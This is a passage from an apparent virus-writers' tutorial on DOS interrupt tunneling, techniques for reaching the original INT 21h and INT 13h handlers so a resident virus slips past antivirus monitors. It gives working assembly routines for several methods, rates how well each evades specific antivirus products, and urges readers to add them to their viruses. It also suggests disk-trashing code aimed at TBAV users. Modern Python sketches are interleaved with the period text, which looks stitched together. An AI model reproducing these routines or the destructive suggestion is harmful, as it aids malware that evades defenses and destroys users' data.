    In short, the results of the new code tracing engine are impressive, as it
is very successful in tunneling i21, i20, and i13, unless DESQView is running,
in which case the i13 tunneler doesn't work.  Of course, the improvements
weren't only in how well the code tracer works... I also strove to decrease
size requirements as well:

         .---------------------------.-------.-------.-------------.
         | Module                    | CT #1 | CT #2 | Space saved |
         .---------------------------.-------.-------.-------------.
         | CMT decoder               | 216 b | 135 b |   81 bytes  |
         | CMT instruction database  | 253 b | 134 b |  119 bytes  |
         | Code Tracing Engine       | 528 b | 404 b |  124 bytes  |
         .---------------------------.-------.-------.-------------.
         | Total                     | 997 b | 673 b |  324 bytes  |
         '---------------------------'-------'-------'-------------'

    So as you can see, we've dropped nearly a quarter of the code in the code
tracing engine itself, as well as cutting our CMT tables and decoder to a bit
over half the size of the original versions, ending up with a complete code
package about 2/3 the size of the original... not too bad.  Of course, you
could probably
still trim the code size down with some dirty optimizations.  By moving some of
the opcodes in the CMT instruction database inline into the code tracing
engine, like I have done with the jump/call direct access instructions, you
could probably save an extra 30 or so bytes.  But this document is about
tunneling, not how to optimize your code :)
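
    If you want to check the numbers in the table for yourself, here is a small
Python sketch.  The byte counts are copied straight from the table above; the
names (sizes, saving, per_module) are just made up for this illustration.

```python
# Sizes in bytes, copied from the table above: (old CT #1, new CT #2).
sizes = {
    "CMT decoder": (216, 135),
    "CMT instruction database": (253, 134),
    "Code Tracing Engine": (528, 404),
}


def saving(old, new):
    """Return (bytes saved, percentage of the old size that was saved)."""
    return old - new, round(100.0 * (old - new) / old, 1)


per_module = {name: saving(old, new) for name, (old, new) in sizes.items()}
total_old = sum(old for old, _ in sizes.values())
total_new = sum(new for _, new in sizes.values())
total_saved, total_pct = saving(total_old, total_new)

for name, (saved, pct) in per_module.items():
    print(f"{name:26s} {saved:4d} bytes saved ({pct}%)")
print(f"{'Total':26s} {total_saved:4d} bytes saved ({total_pct}%)")
```

    The per-module percentages show that the engine itself shrank the least
and the instruction database the most, which fits with the database being the
part that benefits from the new CMT format.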

-----------------------------------------------------------------------------
Section 2:  INT 2A trapping
-----------------------------------------------------------------------------
    i2A trapping was created many years ago, and as far as I know, at least 2
viruses use it... CHAOS-AD by Sepultura [IR/G], which was printed in IR#7, and
Assassin by Dark Slayer (of Taiwan), which was printed in 40HEX.  I don't know
who created it first, but Sepultura has said that he created it independently.

    .--------------.
    | How it works |
    '--------------'
    Inside the DOS kernel i21 handler, there is an INT 2A instruction, which is
executed near the end of DOS's processing of most of the different i21
functions.  Anyway, i2A generally points to an IRET, or networking code, or
some sneaky AV programs.  Sigh, I suppose sometimes DOS may hook it for its own
uses too, but I'm getting off the track.

    To tunnel i21, you simply hook i2A into your virus, and then, execute a DOS
i21 function.  The DOS kernel then calls i2A later on, transferring control to
your handler, with the CS:IP of the i2A call still on the stack. Then, you scan
through DOS's segment for the marker of an i21 kernel entrypoint (CLI/CMP AH/
etc), save the addresses, restore control to the proper i2A, and then on exit
from the i21 handler, you have the original i21 entrypoint.

    .---------.
    | Example |
    '---------'

orig_21 dw 0, 0
orig_2a dw 0, 0

tunneler proc near
    xor ax, ax
    mov ds, ax
    les ax, ds:[(02ah*4)]
    mov cs:[orig_2a], ax
    mov cs:[orig_2a+2], es      ; save old 2A handler
    cli
    mov word ptr ds:[(02ah*4)], offset new_2a_handler
    mov ds:[(02ah*4)+2], cs     ; write new handler
    sti
    mov ah, 052h
    int 021h                    ; execute any old INT 21 function
    les ax, dword ptr cs:[orig_2a]
    cli
    mov ds:[(02ah*4)], ax
    mov ds:[(02ah*4)+2], es     ; restore old handler
    sti
    ret                         ; exit routine
tunneler endp

new_2a_handler proc far
    push bp
    mov bp, sp
    push ax
    push es
    push di
    push cx                     ; save registers
    mov cx, -1
    les di, [bp+2]              ; set ES:DI to return address
    std                         ; scan backwards
    mov al, 0fah                ; 'CLI'

int_2a_loop:
    scasb
    je int_2a_scan_okay         ; exit if CLI found
    loop int_2a_loop            ; keep scanning
int_2a_scan_error:
    mov word ptr cs:[orig_21], 0
    mov word ptr cs:[orig_21+2], 0
    jmp exit_2a_handler         ; abort if no CLI in whole segment
int_2a_scan_okay:
    cmp word ptr es:[di+2], 0FC80h
    jne int_2a_loop
    inc di                      ; SCASB fixup
    mov cs:[orig_21], di
    mov cs:[orig_21+2], es      ; save CLI's CS:IP (ES:DI)
exit_2a_handler:
    mov ax, [bp+6]
    push ax
    popf                        ; restore proper flags
    pop cx
    pop di
    pop es
    pop ax
    pop bp                      ; restore modified registers
    jmp dword ptr cs:[orig_2a]  ; hand control back to original 2A handler
new_2a_handler endp
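
    If the STD/SCASB dance is hard to follow, the scan itself can be modelled
on a plain byte buffer.  This is only a sketch of the search logic, written in
Python, assuming the "segment" is handed over as a bytes object; the function
name scan_back_for_entry is invented here.  Unlike the assembly, it stops at
offset 0 instead of wrapping around to the top of the segment.

```python
CLI = 0xFA                      # opcode of CLI
CMP_AH = bytes([0x80, 0xFC])    # first two bytes of CMP AH, imm8


def scan_back_for_entry(segment, start):
    """Walk downwards from `start` and return the offset of the first CLI
    that is immediately followed by CMP AH,xx, or None if there is none."""
    for off in range(start, -1, -1):
        if segment[off] == CLI and segment[off + 1:off + 3] == CMP_AH:
            return off
    return None
```

    A lone FA byte sitting in the middle of some other instruction is skipped,
because the two bytes after it don't match.  That is the same job the
CMP WORD PTR ES:[DI+2], 0FC80h check does in the handler above.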

    .----------.
    | Problems |
    '----------'
    There are a few problems with i2A trapping, and with kernel scanning
(looking for the CLI/CMP AH, XX/etc, signature).  There's a discussion of the
problems with kernel scanning at the end of the document, so look there for
those.  In here we'll just discuss i2A specific problems.

    When DOS is in the HMA, your i2A trapper will always return the address of
the entrypoint in the HMA.  Now, we all know that the HMA can be, and is,
turned on and off at will by other programs, which means that sometimes, when
you call the original i21 in the HMA, the HMA won't be available and your virus
will crash the computer.
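
    Why does the HMA vanish?  The HMA is the memory at FFFF:0010 and up, which
only exists above the 1MB mark while the A20 address line is enabled.  Reading
"turned on and off" as the A20 line being switched is my own gloss on the
paragraph above, and the helper name linear is made up, but the arithmetic is
plain real-mode addressing:

```python
def linear(seg, off, a20_enabled=True):
    """Real-mode linear address of seg:off.

    With A20 disabled, bit 20 is forced to zero, so anything past 1MB wraps
    around to the bottom of memory."""
    addr = (seg << 4) + off
    return addr if a20_enabled else addr & 0xFFFFF


print(hex(linear(0xFFFF, 0x0010)))          # first byte of the HMA
print(hex(linear(0xFFFF, 0x0010, False)))   # same pointer with A20 off
```

    With A20 off, the same far pointer lands in the interrupt vector table
instead of the DOS kernel, which is why calling a saved HMA entrypoint at the
wrong moment ends so badly.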

    Also, there are a few ways to specifically stop i2A trapping, all of which
require you to be hooked into i21 yourself.  The easiest method is for your
i21 handler, after executing the original i21, to call i2A again, with a fake
CLI/CMP in your own segment to fake the DOS entrypoint signature.  This may,
however, cause some problems for programs which specifically hook into i2A to
handle specific tasks, etc, which may become confused.  A smarter method would
be to replace i2A with a null IRET handler on entry to i21, then execute the
original i21, and then return i2A to its proper value.  Once again, this may
cause problems with other programs which hook i2A for specific tasks.

    .----------------------.
    | How does it size up? |
    '----------------------'
    Well, basically, anti-i2A code isn't really present in any commercial AV
TSR software.  However, there are the problems associated with DOS kernel
scanning... such as network incompatibility, etc, which you'll read about much
later in the document.  Generally speaking, apart from the DOS kernel scanning
problems, the routine seems to work pretty much okay on most systems I've seen
so far.

-----------------------------------------------------------------------------
Section 3:  Grabbing i13 from the DOS kernel
-----------------------------------------------------------------------------
    This backdoor was first seen in many of the bulgarian viruses from long ago
when Bulgaria was the virus writing capital of the world (well, supposedly
anyway).

    .-----------------------------.
    | The info (from Ralf Brown)  |
    '-----------------------------'
INT 2F - DOS 3.2+ - SET DISK INTERRUPT HANDLER
        AH = 13h
        DS:DX -> interrupt handler disk driver calls on read/write
        ES:BX = address to restore INT 13 to on system halt (exit from root
                 shell) or warm boot (INT 19)
Return: DS:DX set by previous invocation of this function
        ES:BX set by previous invocation of this function
Notes:  IO.SYS hooks INT 13 and inserts one or more filters ahead of the
          original INT 13 handler.  The first is for disk change detection
          on floppy drives, the second is for tracking formatting calls and
          correcting DMA boundary errors, the third is for working around
          problems in a particular version of IBM's ROM BIOS
        before the first call, ES:BX points at the original BIOS INT 13; DS:DX
          also points there unless IO.SYS has installed a special filter for
          hard disk reads (on systems with model byte FCh and BIOS date
          "01/10/84" only), in which case it points at the special filter
        most DOS 3.2+ disk access is via the vector in DS:DX, although a few
          functions are still invoked via an INT 13 instruction

    .---------.
    | Example |
    '---------'
orig_13 dw 0, 0

grab_13 proc near
    mov ah, 013h
    int 02fh                    ; grab original i13 handler addresses
    push es
    push bx                     ; save address we want on the stack
    mov ah, 013h
    int 02fh                    ; restore original addresses (as they were
                                ; corrupted on the first call)
    pop bx
    pop es
    mov cs:[orig_13], bx
    mov cs:[orig_13+2], es      ; save original i13 address in a variable
    ret                         ; exit
grab_13 endp
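
    The reason for calling the function twice is that it is a swap: it stores
whatever you pass in and hands back what was there before.  Here is a toy
Python model of just that behaviour.  The class and function names and all the
addresses are invented for illustration; far pointers are shown as
(segment, offset) tuples.

```python
class DiskHandlerSlot:
    """Toy model of the two far pointers that INT 2F/AH=13h swaps."""

    def __init__(self, dsdx, esbx):
        self.dsdx = dsdx
        self.esbx = esbx

    def int2f_ah13(self, dsdx, esbx):
        """Store the caller's values and hand back the previous ones."""
        old = (self.dsdx, self.esbx)
        self.dsdx, self.esbx = dsdx, esbx
        return old


def peek(slot, junk_dsdx, junk_esbx):
    """Read the stored pointers without leaving the slot modified."""
    first = slot.int2f_ah13(junk_dsdx, junk_esbx)   # slot now holds junk
    slot.int2f_ah13(*first)                         # put the originals back
    return first
```

    After the second call the slot holds exactly what it held before, and the
junk values come back out again, which is what the "restore original
addresses" comment in the listing is about.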

    .------------.
    | Commentary |
    '------------'
    As you can already imagine, this method, although sounding fairly secure,
is probably the worst possible way to tunnel :)  Since it was utilized in the
80's, a time when AV manufacturers had time to actually disassemble and
understand each and every single (rare) virus they were given, the AV people
already know this trick, and a few trap this call in their TSR modules and
return the address to their own i13 handler code (TBDRIVER is one example, more
about it in the next section).  If it wasn't for the vulnerability to AV
software, this method would be practically guaranteed to work as it is a
documented function of DOS.

-----------------------------------------------------------------------------
Section 4:  DOS kernel scanning for i13
-----------------------------------------------------------------------------
    Since the very beginning of DOS, segment 70H has been used for all of its
disk processing functions.  Luckily for us, the original BIOS address of i13 is
stored at 70:B4... however, if we were to just use the value at this address,
we could run into problems in new and old DOS versions which may change the
location.  So, by scanning through segment 70h for a CALL DWORD PTR [00B4]...
if we find one, then we know the value at 70:B4 is valid for usage.  The author
of 'Creeping Death' was the first that I know of to utilize this method.  Time
for a pre-coded example.

    .---------.
    | Example |
    '---------'
kernel_13 proc near
    mov ax,70h
    mov ds,ax
    cld                     ; LODSW must step forwards
    mov si, 1
kernel_13_loop:
    cmp si, 0
    je kernel_13_abort      ; exit when we've finished total scan

    dec si
    lodsw                   ; get data from DS:SI

    cmp ax,1effh            ; is it the CALL FAR [X]?
    jne kernel_13_loop      ; nope, keep scanning

    cmp word ptr ds:[si],0b4h
    jne kernel_13_loop

    mov si, 0b4h
    push word ptr ds:[si]
    pop word ptr cs:[orig_13]
    push word ptr ds:[si+2]
    pop word ptr cs:[orig_13+2]
    clc
    ret
kernel_13_abort:
    mov word ptr cs:[orig_13], 0
    mov word ptr cs:[orig_13+2], 0
    stc
    ret
kernel_13 endp
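
    The same check can be modelled on a byte buffer, which makes the encoding
easier to see: CALL FAR [00B4] assembles to FF 1E B4 00, and the dword at
offset B4 is stored offset first, segment second.  This is a Python sketch
only; find_int13_slot is a made-up name and the buffer stands in for segment
70h.

```python
import struct

CALL_FAR_MEM = bytes([0xFF, 0x1E])   # CALL FAR [disp16]
SLOT = 0x00B4                        # offset the text says holds the pointer


def find_int13_slot(seg):
    """Return (segment, offset) stored at SLOT if a CALL FAR [SLOT] exists
    somewhere in the buffer, otherwise None."""
    needle = CALL_FAR_MEM + struct.pack("<H", SLOT)
    if seg.find(needle) < 0:
        return None
    off, sgm = struct.unpack_from("<HH", seg, SLOT)
    return sgm, off
```

    Searching for all four bytes at once is equivalent to the two CMPs in the
listing, it just can't be fooled by an FF 1E that happens to be followed by a
different displacement.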

    .----------.
    | Problems |
    '----------'
    This routine has also been around for a long time, just like the last i13
grabbing method... however, no AV program I know of traps it.  Trapping such a
routine is -VERY- easy... simply check that 70:B4 is valid for yourself, then
switch the value there with the address of your own i13 handling code,
which means that all i13 access will be redirected to your handler where you
can check for writes to track 0, etc.  You yourself could, however, bypass this
by making sure the segment of the address at 70:B4 is F000 (BIOS segment) or
C800 (old XT DISK BIOS segment) before using it (which TBDRIVER stops... read
the info below this).  To make all these attempts futile, the AV can replace
the CALL FAR with an INT xx which calls their own i13 handling code, which then
gives control over to the address stored in 70:B4 once all the tests for
virus-like behaviour have been done.

    .-----------------.
    | How good is it? |
    '-----------------'
    Strangely enough, TBDRIVER points the value at 70:B4 to its own code...
however in effect, this code is null, simply passing control to the proper
original handler.  Sigh, I think it's there so if you test the address at 70:B4
for the BIOS i13 handler segment... the test will fail and you will think the
address is invalid... when in reality it is perfectly valid.  Oh well.  Apart
from that... which is basically no problem at all, this routine should work a
majority of the time.

-----------------------------------------------------------------------------
Section 5:  DOS terminate backdoor
-----------------------------------------------------------------------------
    This is one of the most obscure of tunneling methods I have been told of to
date, and I haven't seen any viruses which use it specifically.  Not many
people seem to know about it, probably because it is the least efficient of all
the methods presented so far ;)

    .-------------.
    | What is it? |
    '-------------'
    You may remember old faithful interrupt 20, DOS's now obsolete function
for program termination.  Well, due to the way DOS is set up, sometimes the
address of i20 can help us track down the original DOS kernel entrypoint to the
i21 handler.

    When DOS is loaded into low memory on bootup, i20 points to the DOS code
segment, and not many programs hook into i20, and definitely no normal run of
the mill TSR's will hook into it, so generally speaking, i20 is always pointing
to the DOS code segment, which means we could do kernel scanning for the
CLI/CMP pair.

    But wait, what if DOS is loaded high?  Well that is even better for us,
because the i20 points to a FAR JMP, followed by another FAR JMP, and (at least
on my system), is followed by an IRET, with the second FAR JMP being a direct
JMP to the i21 entrypoint!  So, in memory, things will look like this.

    i20_entrypoint:
        JMP FAR xxxx:xxxx       ; jumps a few bytes below i21 entrypoint
        JMP FAR xxxx:xxxx       ; jumps directly to i21 entrypoint
        IRET

    Alternatively, you can tunnel i20 itself and scan for the i21 CLI/CMP pair,
however you'd have to do this with code tracing, rather than emulation or
single stepping, because executing i20 will terminate the currently running
program or, alternatively, just bugger things up.

    The biggest problem with tunneling with this method... is working out
whether DOS is loaded high or low... because if you think it is loaded low,
but i20 has really been hooked by another program, then searching for the
CLI/CMP pair could cause you to misfire badly.  On my system, i20 always
points to below the first MCB, whether DOS is high or low, so my example
routine assumes that if this is not the case, then i20 has been hooked.  Things
may be different on other people's systems however, so you may want to check
around your own i20.

    .---------------.
    | Example time! |
    '---------------'
i20_exploit proc near
    mov ax, 3520h
    int 21h
    mov ax, es
    mov ds, ax
    mov si, bx              ; point DS:SI to i20
    cmp ax, cs:[first_mcb]
    jae i20_hooked
i20_high:
    cmp byte ptr ds:[si], 0eah
    jne i20_low             ; check for first JMP FAR
    add si, 5
    cmp byte ptr ds:[si+5], 0cfh
                            ; check for IRET (maybe this should be left out)
    jne i20_hooked
    cmp byte ptr ds:[si], 0eah
                            ; check for second JMP FAR
    jne i20_hooked
    inc si
    lds si, ds:[si]
    mov cs:[orig_21], si
    mov cs:[orig_21+2], ds
    clc
    ret
i20_hooked:
    mov word ptr cs:[orig_21], 0
    mov word ptr cs:[orig_21+2], 0
    stc
    ret
i20_low:
    push ds
    pop es
    mov cx, -1
    std                         ; scan backwards
    xor di, di                  ; bleh :)
    mov al, 0fah                ; 'CLI'

i20_scan_loop:
    scasb
    je i20_scan_okay            ; exit if CLI found
    loop i20_scan_loop          ; keep scanning
i20_scan_error:
    cld                         ; don't leave the direction flag set
    mov word ptr cs:[orig_21], 0
    mov word ptr cs:[orig_21+2], 0
    stc
    ret                         ; exit if no CLI found
i20_scan_okay:
    cmp word ptr es:[di+2], 0FC80h
    jne i20_scan_loop
    cld                         ; don't leave the direction flag set
    inc di                      ; SCASB fixup
    mov cs:[orig_21], di
    mov cs:[orig_21+2], es      ; save CLI's CS:IP (ES:DI)
    clc
    ret                         ; exit happily
i20_exploit endp
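
    The "DOS is high" branch is really just a layout check: EA, four bytes of
pointer, EA, four bytes of pointer, CF.  Modelled on a byte buffer in Python
it looks like this.  It is a sketch only; i21_from_i20_stub is an invented
name, and where the assembly falls through to the low-DOS scan when the first
byte isn't a JMP FAR, the model simply returns None.

```python
import struct

JMP_FAR = 0xEA
IRET = 0xCF


def i21_from_i20_stub(mem, entry):
    """Return (segment, offset) of the second JMP FAR's target if `entry`
    points at JMP FAR / JMP FAR / IRET, otherwise None."""
    if len(mem) < entry + 11:
        return None
    if mem[entry] != JMP_FAR or mem[entry + 5] != JMP_FAR:
        return None
    if mem[entry + 10] != IRET:
        return None
    off, seg = struct.unpack_from("<HH", mem, entry + 6)
    return seg, off
```

    Dropping the IRET test, as the comment in the listing suggests, would make
the check looser: any two consecutive far jumps would then pass.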

    .----------------------.
    | Bzzt!  Lie detected! |
    '----------------------'
    Okay okay, so I lied earlier on when I said not many programs hook i20.
Well, it was actually a half-truth.  Not many programs DO hook i20, however, a
few very major programs DO hook it :)  DESQView and Windows definitely hook it,
and generally, any shell program or multitasking program would hook into it.
Anything which needs to control programs might hook it, so this includes
viruses, which sometimes use i20 in tricky ways to go resident past AV tsr
software :)  However, generally, these viruses restore i20 to its proper value
once their work has been done, which means unless the program your tunneler is
executing from has a copy of a virus which isn't resident, but is using i20
techniques to go resident, the chances of conflicting are minimal.

    .---------------------.
    | But is it reliable? |
    '---------------------'
    Not many VX people know about this technique, let alone AV people!  I have
never seen this technique in a virus, so I doubt very much that any AV out
there traps it.  Even if they do, they'll have to fool your specific way of
checking if it is a real DOS i20 or if it has been hooked, and they'd have to
emulate the code signatures you check for, etc, etc.

    So, although it is reliable from a standpoint of not being detectable by AV
software, it is not very reliable speaking from a 'per-system success rate'
point of view... since a lot of people run DESQView/Windows/etc.  However, if
the pointers for i20 ARE correct, then you've got a good routine to find i21!
So, you may want to include these routines in your virus anyway, along with
another i21 tunneling method as a backup in case this one fails.

-----------------------------------------------------------------------------
Section 6:  CP/M utilization
-----------------------------------------------------------------------------
    There was an extensive document written about this tunneling method in
VLAD#3, so if you don't understand my version of how to utilize this backdoor,
then feel free to go fuck yourse... I mean, uuuh, go read the other version :)

    .-------.
    | CP/M? |
    '-------'
    Back in the days before DOS, the predominant operating system of the time
was CP/M.  When Microsoft shipped DOS 1.0 for the IBM PC (built on Tim
Paterson's 86-DOS), it was made attractive to buyers by making it easy for
people to port their CP/M code over to DOS, and since DOS is very
backwards-compatible, through the many upgrades of DOS there are still a few
(now totally obsolete) functions retained from the CP/M compatible bits,
namely, the CP/M function dispatcher.

    The code for this dispatcher is stored very close to the handler for i21,
inside the kernel, because the CP/M handler actually uses the i21 handler to do
its dirty work (it converts its calls into i21 calls).  Anyway, if we can
tunnel into the CP/M handler, using either code tracing or single step mode, or
even possibly if the CP/M handler hasn't been modified and still points to the
DOS kernel, we can try to deduce the i21 beginning.

    Anyway, because of the weird way CP/M operates, there is no real interrupt
to call for its routines, there are only entrypoints, of which there are two,
stored in different places.  First, there is the data at i30, which is a JMP
FAR off:seg, and the data in the PSP at offset 5, which is a CALL FAR off:seg.

    Unfortunately for us, some AV programs would purposely corrupt the i30
entry, which is created on bootup by DOS, and apart from this, thanks to DOS
and DESQView, the entry in the PSP is usually corrupted!  In some DOS versions,
it points to the correct address, in some it points 2 bytes too low, and under
DESQView, it points (from the version I have) 12 bytes too low.  Anyway, using
either entry is too much hassle, because of corruption, so, what can you do?

    The answer is simple, there is only one true entry you can rely upon, and
that is stored somewhere in memory in the PSP of the original shell (usually
COMMAND.COM) itself.  How do we find this?  At offset 16h in the current PSP,
is the segment address of the PSP of the calling program.  Every (valid) chain
of PSP's eventually leads to COMMAND.COM or whatever processor the user is
using, and from there you can get the real CP/M entrypoint, from the shell's
PSP.
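
    Climbing the PSP chain is just following parent pointers until one points
at itself (or at nothing).  Here is a small Python model, with memory replaced
by a dictionary that maps each PSP segment to the word stored at its offset
16h.  The name find_shell_psp and the segment values used with it are made up,
and the limit parameter is my own addition to guard against a corrupted chain
that loops.

```python
def find_shell_psp(parent_of, start, limit=64):
    """Follow parent-PSP links from `start` and return the topmost PSP.

    parent_of maps a PSP segment to the parent segment stored at PSP:16h.
    Returns None if the chain has not ended after `limit` steps."""
    psp = start
    for _ in range(limit):
        parent = parent_of.get(psp, 0)
        if parent == psp or parent == 0:
            return psp          # own parent, or no parent: top of the chain
        psp = parent
    return None                 # looks like a loop, give up
```

    The two stop conditions are the same ones the assembly example in this
section tests for: a PSP that is its own parent, or a parent field of zero.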

    .--------------.
    | Marker bytes |
    '--------------'
    There are two sets of marker bytes that can be at the original kernel i21
entrypoint.  When raw DOS or QEMM is loaded, the marker is 'FA80', with the
'1E1E' marker of the CP/M code 025h bytes below this position.  When EMM386 is
loaded, the kernel i21 handler precedes the CP/M handler by 032h bytes, with
both having the marker of '9090, E8'.

    Generally, PSP tracers go through and check for the CP/M marker bytes, and
then guess at the correct location of i21 from there... which generally works
under DOS/QEMM/HIMEM.SYS.  However, when you load up DESQView or Windows, they
replace the DOS CP/M call with their own code, which then chains onto their own
i21 handlers, which later chain onto the DOS i21 handlers... causing the former
marker bytes to become invalid.

    However, no matter what, in the end everything is translated down to the
DOS kernel i21 calls, so, if you check for the i21 entrypoint marker bytes, and
-THEN- check for CP/M bytes in their proper position, then you will work under
DOS/QEMM/HIMEM/WINDOWS/DESQVIEW software and this is a good thing[tm].  BUT,
even then there are PROBLEMS!  ARGH!  The pure DOS version of the CP/M handler
doesn't chain directly onto the i21 handler... it chains a few bytes AFTER the
CLI/CMP AH, XX/etc, directly to a CMP/JE instruction.  Of course you -COULD-
check for this, but it would require a lot of messing about to make sure you are
right in all circumstances.

    However, to do that, you need to have a stable method of tracing through
all the junk code that programs like DESQView/Windows use for their interrupt
handlers, and as of now, you don't have that technology.  Why?  Because code
tracing is the only method you know of so far, and it is in no way stable
enough to trace through something like DESQView (trust me, I tried).  Emulation
could possibly be an alternative, but you don't know about emulation technology
yet :)

    So what are your choices?  Well, you have two.  Because of the way the DOS
CP/M handler is set up, there SHOULD be a chain of JMP FAR off:seg instructions
from the CP/M entrypoint you get, to the real entrypoint near the DOS i21
kernel.  If the CP/M chain has been tapped into however, there will be no
chain, or it will lead somewhere else where there won't be the correct marker
signature bytes that you'll be scanning for.

    Alternatively, you could use single stepping.  Now, this is not such a bad
idea, at least, at first glance.  However, there are a few things you have to
be very very careful of if you choose this technique, which I'll tell you
about later.  If you -DO- use this technique, then you need to know how to use
the CP/M entrypoint you got from COMMAND.COM's PSP.

    To execute a CP/M call is fairly tricky.  Only DOS i21 functions below 024h
can be run, and instead of being in AH they are in CL.  Also, CP/M calls always
corrupt AX, and possibly a few other registers.  Anyway, to do a CP/M call, you
push your return IP onto the stack, followed by your return CS, followed by the
flags (yes, the stack is backwards, ip, cs, flags), and then jump to the CP/M
entrypoint.  So, simply do your single step mode routines as usual, and check
for the proper markers along the way.

    .--------------.
    | Example code |
    '--------------'
    This example uses a quick method of climbing up the PSP chain to get to the
command shell's PSP, and then getting the CP/M entrypoint from there.  After
this, it follows any FAR JMP's as far as possible, but once the FAR JMP's have
stopped, it immediately checks for the magic marker bytes, meaning this
technique will not work under DESQView or anything else which hooks into the
CP/M chain of command.

;; on entry, make sure DS==PSP address
; returns DS:SI as i21 address
; carry clear on success, carry set on failure
;
tunnel_cpm proc near
    mov ax, ds:[016h]
    mov bx, ds
    cmp ax, bx
    je psp_end
    cmp ax, 0
    je psp_end
    mov ds, ax
    jmp tunnel_cpm

psp_end:
    mov si, 5

jump_loop:
    lds si, ds:[si+1]
    cmp byte ptr ds:[si], 0eah
    je jump_loop

check_first_magic:
    cmp word ptr ds:[si], 9090h
    jne check_second_magic
    sub si, 32h
    cmp word ptr ds:[si], 9090h
    jne tunnel_error

tunnel_success:
    clc
    ret

check_second_magic:
    cmp word ptr ds:[si], 2e1eh
    jne tunnel_error
    add si, 25h
    cmp word ptr ds:[si], 80fah
    je tunnel_success

tunnel_error:
    stc
    ret
tunnel_cpm endp

    .--------------.
    | Aaaaaaaaargh |
    '--------------'
    That will be your response when you run this code under TBAV :)  TBAV (7.06
at least, but probably long before that as well) is very mean when it comes to
CP/M calls, replacing not only the i30 and PSP values with junk (although not
COMMAND.COM's), but OVERWRITING the ORIGINAL entry to the CP/M calls with an
i20!  Need I even mention the incompatibility horrors that this has and will
create for old programs, CP/M emulators, etc?  TBAV doesn't even give you an
error message, it just brutally quits the running program.  How naughty.

    This is why I advised against using single step tunnelers to do your dirty
work :)  You -COULD- simply check for an 'int 20' in your single step handling
code... sure... that would be easy.  As far as I know, tunneling the CP/M
handlers with single step mode is very reliable as long as you check for the
i20.  However, remember, TBAV might like to change the i20 one day into an
AH=4C/INT 21 :)

    Should TBAV CP/M killer code be encountered, you may like to tunnel another
interrupt, say, oh, I don't know, i13 maybe, trashing the hard disk, and giving
the user an error message from DOS, complaining about bad CP/M dispatch
handlers, and finally, of course, giving you the name of the bad program which
is responsible, TBDRIVER.EXE, and asking you to ring the 'product developer'
for more information.  ROFL.  I can just imagine some poor loser ringing up
Thunderbyte support and saying that his hard disk has disappeared while he was
running TBAV... and that there was some error about bad CP/M handlers.... :)

    Normally I don't condone disk-trashing code... but BLATANT disregard for
software compatibility such as that shown by Thunderbyte is just unacceptable
in my books.  Just stopping a program dead in its tracks... how brutal.

    Programs have rights too you know

    .--------------.
    | Reliability? |
    '--------------'
    Yes, this routine is very reliable.  Well, once again, it really depends on
what we're talking about... sure, this routine, if it works, is VERY reliable,
and it is very unlikely your routine will be caught out by resident AV
software.  As for how successful it is in the real world, I'd think it is
probably about as reliable as the i20 trick.  Basically, it will definitely
NOT hurt your virus to include a routine such as this.

-----------------------------------------------------------------------------
Section 7:  Uuuuuh, SFT tunneler?
-----------------------------------------------------------------------------
    Okay, so, I don't exactly understand WHY this routine works, but, well, it
does, shrug.  It was allegedly created by the STEALTH group, and included in a
virus called Killer, which was printed in VLAD#7.

    .----------.
    | The code |
    '----------'
stealth proc near
    cld
    mov ah, 52h
    int 21h             ; get DOS list-of-lists
    lds si, es:[bx+4]   ; DS:SI = DOS SFT tables
    lds si, ds:[si-4]   ; DS:SI = somewhere in the DOS code segment?
stealth_loop:
    dec si
    cmp word ptr ds:[si], 0e18ah
    jne stealth_loop    ; MOV AH, CL
    cmp byte ptr ds:[si+2], 0ebh
    jne stealth_loop    ; JMP SHORT
stealth_calculate:
    lodsb
    cmp al, 0fah
    jne stealth_calculate   ; search for DOS kernel entrypoint CLI
    dec si
    mov cs:[orig_21], si
    mov cs:[orig_21+2], ds
    ret                     ; save addresses and exit
stealth endp

    .------.
    | Huh? |
    '------'
    Yeah, that was my response too.  I seem to have most of it worked out
however.  What it does, is somehow find the DOS code segment, the address of
which is stored at the dword below the beginning of the SFT tables... and then
it begins scanning for the CP/M handler in the kernel, before advancing a few
more bytes to find the i21 handler address.  The reason they search for the
CP/M handler instead of straight out looking for the i21 entrypoint is because
searching for both is more reliable... if you want to change the routine to
search for the i21 entrypoint straight away, you'll have to use a long match
string (4-6 bytes) so that you don't get it confused with all the other junk in
the DOS code segment.

    What perplexes me is what the hell the address of the original DOS code
segment is doing just below the SFT tables.  Apart from that, the rest of the
routine is easily understood.
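
    The two-stage search can be modelled on a byte buffer to make the order of
operations clearer: first walk DOWN to the MOV AH,CL / JMP SHORT pair
(8A E1 EB), then walk UP from there to the first CLI (FA).  This is a Python
sketch only; two_stage_scan is a made-up name and the buffer stands in for the
DOS code segment.

```python
ANCHOR = bytes([0x8A, 0xE1, 0xEB])   # MOV AH,CL followed by JMP SHORT
CLI = bytes([0xFA])


def two_stage_scan(seg, start):
    """Return the offset of the first CLI above the nearest anchor pattern
    found below `start`, or None if either stage fails."""
    anchor = None
    for off in range(start - 1, -1, -1):     # stage 1: scan downwards
        if seg[off:off + 3] == ANCHOR:
            anchor = off
            break
    if anchor is None:
        return None
    cli = seg.find(CLI, anchor)              # stage 2: scan upwards
    return cli if cli >= 0 else None
```

    Notice that stage 2 takes the first FA it meets without checking what
follows it, exactly like the LODSB loop in the listing.  That is the part that
leans on the anchor being close enough to the real entrypoint.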

    .---------------------.
    | How reliable is it? |
    '---------------------'
    To be quite honest, I have no idea :)  It seems to work consistently on my
system, even under DESQView and DOSDATA.SYS (a rare change).  If I only knew
what the address pointed to just below the SFT tables was, maybe I could
comment more on its reliability.  HOWEVER, since this routine uses a modified
kernel scanner, it does have the problems associated with kernel scanners,
which are discussed later on in the document.  STEALTH says that this routine
should work on DOS versions 3-7 (Win95)... however they didn't take into
account the problems with kernel scanning.

-----------------------------------------------------------------------------
Section 8:  Double-NOP scanning
-----------------------------------------------------------------------------
    Hehe, sorry, I had to include the weirdest type of tunneler I could find
into this document :)  Hey, sue me.  I've seen this code in the SterCor virus
by Yosha, and the Diametric/Matricide virus by Rajaat [IR/G].  They were coded
differently but used the same principle to do the tunnel.  After a close look
at both, they are coded differently enough to warrant my conclusion that the
two authors came up with the idea independently.  In the time-line, I suspect
that Rajaat may have created the routine before Yosha.  Yosha's was released
to the public before Rajaat's, although I saw Rajaat's even before Yosha's was
released!  Sigh.  Who cares anyway?

    .--------------------.
    | How Rajaat's works |
    '--------------------'
    Rajaat's works by finding the DOS data segment (which is contained usually
in the DOS code segment) and scanning through for the double-NOP signature of
the i21 patch entrypoint.  Each double-NOP is followed by a JMP CS:[DWORD MEM]
instruction, and he checks the address pointed to by the JMP for the CLI/CMP
